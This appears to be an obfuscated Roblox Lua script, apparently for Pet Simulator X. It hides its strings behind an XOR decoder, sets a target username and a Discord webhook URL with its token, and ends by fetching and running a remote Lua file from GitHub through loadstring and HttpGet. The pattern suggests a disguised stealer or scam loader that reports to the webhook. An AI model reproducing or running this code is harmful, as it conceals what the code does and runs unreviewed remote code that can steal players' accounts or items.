--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1 -(391 -(284 + 107)), #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (1 -0) + 0)),v1(v2(v9,(1048 -(64 + 983)) + ((v11-1)% #v9),(154 -((1910 -(700 + 1072)) + (24 -9))) + ((v11-1)% #v9) + 1)))%(2 + 2 + 55 + 197)));end return v5(v10);end Username=v7("\19\156\213\180\66","\126\173\184\215\49\237");WebHook="https://discord.com/api/webhooks/1074046988536000583/84M3RyWL0dUkNfVRSB22L85FQ24m9Z3DSMVPLbtbukQD238dx-iI9lWiU0J5SJYlbiMv";_G.CustomScriptName=v7("\154\53\169\240\151\206\210\113","\217\90\204\158\183\134\167\19");_G.Text1=v7("\233\72\188\3\23\54\154\103\161\11\3\39\222\5\224\68","\186\43\206\106\103\66");_G.Text2=v7("\130\53\175\196\39\132\76\159\179\59\180\144\29\137\89\214\165\32","\213\84\198\176\78\234\43\191");_G.Text3=v7("\205\93\37\249\229\92\46\253\174\102\35\232\231\69\52\233\160\27\110","\142\53\64\154");_G.Text4=v7("\127\94\59\96\104\117\55\88\12\121\57\96\117\108\45\76\2\4\116","\44\42\90\18\28\28\89\63");loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))();
